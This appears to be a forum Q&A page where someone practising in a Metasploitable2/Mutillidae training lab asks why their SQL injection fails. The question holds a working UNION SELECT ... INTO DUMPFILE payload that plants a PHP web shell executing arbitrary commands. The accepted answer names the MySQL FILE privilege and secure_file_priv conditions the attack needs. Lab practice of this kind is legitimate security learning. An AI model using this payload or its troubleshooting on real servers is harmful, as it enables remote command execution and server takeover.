duanan5940 2019-08-04 19:14
浏览 23
已采纳

我需要一些帮助sql注入

I'm currently on planting php file on my local server(metasploitable2 mutillidate) using php backdoor program. I found out how many columns the it has and made a simple code.

' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){ 
echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; 
}?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' --

I encoded this code into url form and submitted but I failed.

It gave me the different error from I've got by far but still it doesn't work.

Error says : 'Error executing query : Can't create/write to file '/var/www/mutillidae/backdoor.php'

I guess it's pretty much about privilege but I'm not sure

  • 写回答

1条回答 默认 最新

  • douli1854 2019-08-04 19:47
    关注

    The MySQL user executing the query has to have the FILE privilege in order to use SELECT ... INTO OUTFILE or SELECT ... INTO DUMPFILE. Also, if the secure_file_priv system variable is set to the pathname of a directory, you can only write to files in that directory.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 如何在scanpy上做差异基因和通路富集?
  • ¥20 关于#硬件工程#的问题,请各位专家解答!
  • ¥15 关于#matlab#的问题:期望的系统闭环传递函数为G(s)=wn^2/s^2+2¢wn+wn^2阻尼系数¢=0.707,使系统具有较小的超调量
  • ¥15 FLUENT如何实现在堆积颗粒的上表面加载高斯热源
  • ¥30 截图中的mathematics程序转换成matlab
  • ¥15 动力学代码报错,维度不匹配
  • ¥15 Power query添加列问题
  • ¥50 Kubernetes&Fission&Eleasticsearch
  • ¥15 報錯:Person is not mapped,如何解決?
  • ¥15 c++头文件不能识别CDialog